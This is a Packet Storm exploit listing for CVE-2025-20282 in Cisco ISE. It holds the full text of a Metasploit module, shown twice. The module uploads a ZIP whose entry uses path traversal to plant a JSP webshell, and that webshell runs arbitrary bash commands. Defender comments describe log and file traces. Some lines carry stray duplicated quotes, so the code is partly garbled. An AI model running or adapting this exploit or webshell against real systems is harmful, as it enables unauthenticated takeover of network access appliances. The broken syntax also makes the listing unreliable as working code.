10
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Description
This Metasploit module exploits an unauthorized file upload vulnerability in Cisco ISE. A ZIP file containing a JSP file whose entry name is a manipulated (path-traversal) path is uploaded. The webshell is then extracted to the webapps folder...
Basic Information
ID
PACKETSTORM:220737
Published
May 11, 2026 at 00:00
==================================================================================================================================
| # Title : Cisco ISE 2.2 Unauthenticated RCE Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.cisco.com/ |
==================================================================================================================================
[+] Summary : An RCE vulnerability in Cisco Identity Services Engine (ISE), identified as CVE-2025-20282. The flaw is related to insecure file upload handling combined with ZIP path traversal.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for the Cisco ISE file-upload flaw referenced in the
# metadata below as CVE-2025-20282.
#
# Defender notes (everything listed is visible in the code of this module; see
# also the 'Notes' metadata: IOC_IN_LOGS, ARTIFACTS_ON_DISK):
#   1. Network trace: a multipart/form-data POST carrying a .zip to
#      <TARGETURI>/admin/files-upload/z, followed by a GET to
#      <TARGETURI>/admin/error/<8 random letters>.jsp with a `cmd` query
#      parameter.
#   2. Host trace: a new .jsp file under appsrv/apache-tomcat/webapps/admin/error/.
# Either trace is a direct detection opportunity in access logs or
# file-integrity monitoring.
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
# AutoCheck wires #check in ahead of #exploit (framework behaviour, not shown here).
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
# FileDropper provides register_files_for_cleanup, used in #exploit.
include Msf::Exploit::FileDropper
# Module metadata plus the operator-facing options (RPORT, SSL, TARGETURI).
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cisco ISE Unauthenticated RCE (CVE-2025-20282)',
'Description' => %q{
This mod exploits an unauthorized file upload vulnerability in Cisco ISE.
A ZIP file containing a JSP file with a manipulated path (Path Traversal) is uploaded.
The webshell is then extracted to the Webapps folder.
},
'Author' => [ 'indoushka' ],
'License' => MSF_LICENSE,
'References' => [ ['CVE', '2025-20282'] ],
'Platform' => 'linux',
'Arch' => ARCH_CMD,
'Targets' => [ ['Cisco ISE', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => '2025-01-01',
# Declared side effects: request lines in server logs and a file left on disk.
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
# Defaults: HTTPS on 443, base path '/'.
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path', '/'])
]
)
end
# Probes the upload route with a GET. Only an HTTP 405 is treated as evidence
# the route exists ("Appears"); no response is "Unknown", anything else "Safe".
# NOTE(review): a 405 shows that the route exists and rejects GET, not that the
# host is unpatched -- treat "Appears" from this check as low confidence when
# triaging scan results.
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'files-upload', 'z')
})
return CheckCode::Unknown unless res
return CheckCode::Appears if res.code == 405
CheckCode::Safe
end
# Builds an in-memory ZIP whose single entry name is a relative path into the
# Tomcat webapps tree, uploads it as a multipart form field named "file", and
# then requests the dropped JSP once with the encoded payload in the `cmd`
# query parameter. The server-side extractor is expected to honour the entry
# name as given (ZIP path traversal).
def exploit
shell_name = "#{Rex::Text.rand_text_alpha(8)}.jsp"
# Relative entry name; where it resolves depends on the extractor's working
# directory on the appliance -- not verifiable from this file.
traversal_path = "appsrv/apache-tomcat/webapps/admin/error/#{shell_name}"
print_status("Creating a ZIP file with path manipulation...")
zip_data = Rex::Zip::Archive.new
zip_data.add_file(traversal_path, jsp_payload)
print_status("Uploading Webshell: #{shell_name}")")
post_data = Rex::MIME::Message.new
post_data.add_part(
zip_data.pack,
'application/zip',
'binary',
"form-data; name=\"file\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.zip\""
)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'files-upload', 'z'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
})
# Any status other than 200 (or no response at all) aborts the run.
unless res && res.code == 200
fail_with(Failure::UnexpectedReply, "Upload failed (Response code: #{res&.code})")")
end
# Marks the dropped JSP for deletion by FileDropper. NOTE(review): presumably
# this only runs when a session is later closed, so a run that fails after the
# upload leaves the file on disk -- verify against FileDropper semantics.
register_files_for_cleanup("appsrv/apache-tomcat/webapps/admin/error/#{shell_name}")
print_status("Command being executed via Webshell...")
cmd = Rex::Text.uri_encode(payload.encoded)
execute_command(shell_name, cmd)
end
# Sends one GET to the dropped JSP with the command in the `cmd` query
# parameter; the trailing 5 is the response timeout (seconds) passed to
# send_request_cgi.
def execute_command(shell_name, cmd)
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'error', shell_name),
'vars_get' => { 'cmd' => cmd }
}, 5)
end
# The on-disk artifact: a JSP that passes the `cmd` request parameter to
# /bin/bash -c and copies the process's standard output into the HTTP
# response. A content rule matching Runtime.getRuntime().exec in .jsp files
# under webapps/admin/error/ gives file-integrity/EDR tooling a direct signature.
def jsp_payload
<<~JSP
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", cmd});
InputStream in = p.getInputStream();
int c;
while ((c = in.read()) != -1) out.print((char)c);
}
%>
JSP
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : Cisco ISE 2.2 Unauthenticated RCE Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.cisco.com/ |
==================================================================================================================================
[+] Summary : An RCE vulnerability in Cisco Identity Services Engine (ISE), identified as CVE-2025-20282. The flaw is related to insecure file upload handling combined with ZIP path traversal.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for the Cisco ISE file-upload flaw referenced in the
# metadata below as CVE-2025-20282.
#
# Defender notes (everything listed is visible in the code of this module; see
# also the 'Notes' metadata: IOC_IN_LOGS, ARTIFACTS_ON_DISK):
#   1. Network trace: a multipart/form-data POST carrying a .zip to
#      <TARGETURI>/admin/files-upload/z, followed by a GET to
#      <TARGETURI>/admin/error/<8 random letters>.jsp with a `cmd` query
#      parameter.
#   2. Host trace: a new .jsp file under appsrv/apache-tomcat/webapps/admin/error/.
# Either trace is a direct detection opportunity in access logs or
# file-integrity monitoring.
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
# AutoCheck wires #check in ahead of #exploit (framework behaviour, not shown here).
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
# FileDropper provides register_files_for_cleanup, used in #exploit.
include Msf::Exploit::FileDropper
# Module metadata plus the operator-facing options (RPORT, SSL, TARGETURI).
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cisco ISE Unauthenticated RCE (CVE-2025-20282)',
'Description' => %q{
This mod exploits an unauthorized file upload vulnerability in Cisco ISE.
A ZIP file containing a JSP file with a manipulated path (Path Traversal) is uploaded.
The webshell is then extracted to the Webapps folder.
},
'Author' => [ 'indoushka' ],
'License' => MSF_LICENSE,
'References' => [ ['CVE', '2025-20282'] ],
'Platform' => 'linux',
'Arch' => ARCH_CMD,
'Targets' => [ ['Cisco ISE', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => '2025-01-01',
# Declared side effects: request lines in server logs and a file left on disk.
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
# Defaults: HTTPS on 443, base path '/'.
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path', '/'])
]
)
end
# Probes the upload route with a GET. Only an HTTP 405 is treated as evidence
# the route exists ("Appears"); no response is "Unknown", anything else "Safe".
# NOTE(review): a 405 shows that the route exists and rejects GET, not that the
# host is unpatched -- treat "Appears" from this check as low confidence when
# triaging scan results.
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'files-upload', 'z')
})
return CheckCode::Unknown unless res
return CheckCode::Appears if res.code == 405
CheckCode::Safe
end
# Builds an in-memory ZIP whose single entry name is a relative path into the
# Tomcat webapps tree, uploads it as a multipart form field named "file", and
# then requests the dropped JSP once with the encoded payload in the `cmd`
# query parameter. The server-side extractor is expected to honour the entry
# name as given (ZIP path traversal).
def exploit
shell_name = "#{Rex::Text.rand_text_alpha(8)}.jsp"
# Relative entry name; where it resolves depends on the extractor's working
# directory on the appliance -- not verifiable from this file.
traversal_path = "appsrv/apache-tomcat/webapps/admin/error/#{shell_name}"
print_status("Creating a ZIP file with path manipulation...")
zip_data = Rex::Zip::Archive.new
zip_data.add_file(traversal_path, jsp_payload)
print_status("Uploading Webshell: #{shell_name}")")
post_data = Rex::MIME::Message.new
post_data.add_part(
zip_data.pack,
'application/zip',
'binary',
"form-data; name=\"file\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.zip\""
)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'files-upload', 'z'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
})
# Any status other than 200 (or no response at all) aborts the run.
unless res && res.code == 200
fail_with(Failure::UnexpectedReply, "Upload failed (Response code: #{res&.code})")")
end
# Marks the dropped JSP for deletion by FileDropper. NOTE(review): presumably
# this only runs when a session is later closed, so a run that fails after the
# upload leaves the file on disk -- verify against FileDropper semantics.
register_files_for_cleanup("appsrv/apache-tomcat/webapps/admin/error/#{shell_name}")
print_status("Command being executed via Webshell...")
cmd = Rex::Text.uri_encode(payload.encoded)
execute_command(shell_name, cmd)
end
# Sends one GET to the dropped JSP with the command in the `cmd` query
# parameter; the trailing 5 is the response timeout (seconds) passed to
# send_request_cgi.
def execute_command(shell_name, cmd)
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'error', shell_name),
'vars_get' => { 'cmd' => cmd }
}, 5)
end
# The on-disk artifact: a JSP that passes the `cmd` request parameter to
# /bin/bash -c and copies the process's standard output into the HTTP
# response. A content rule matching Runtime.getRuntime().exec in .jsp files
# under webapps/admin/error/ gives file-integrity/EDR tooling a direct signature.
def jsp_payload
<<~JSP
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", cmd});
InputStream in = p.getInputStream();
int c;
while ((c = in.read()) != -1) out.print((char)c);
}
%>
JSP
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================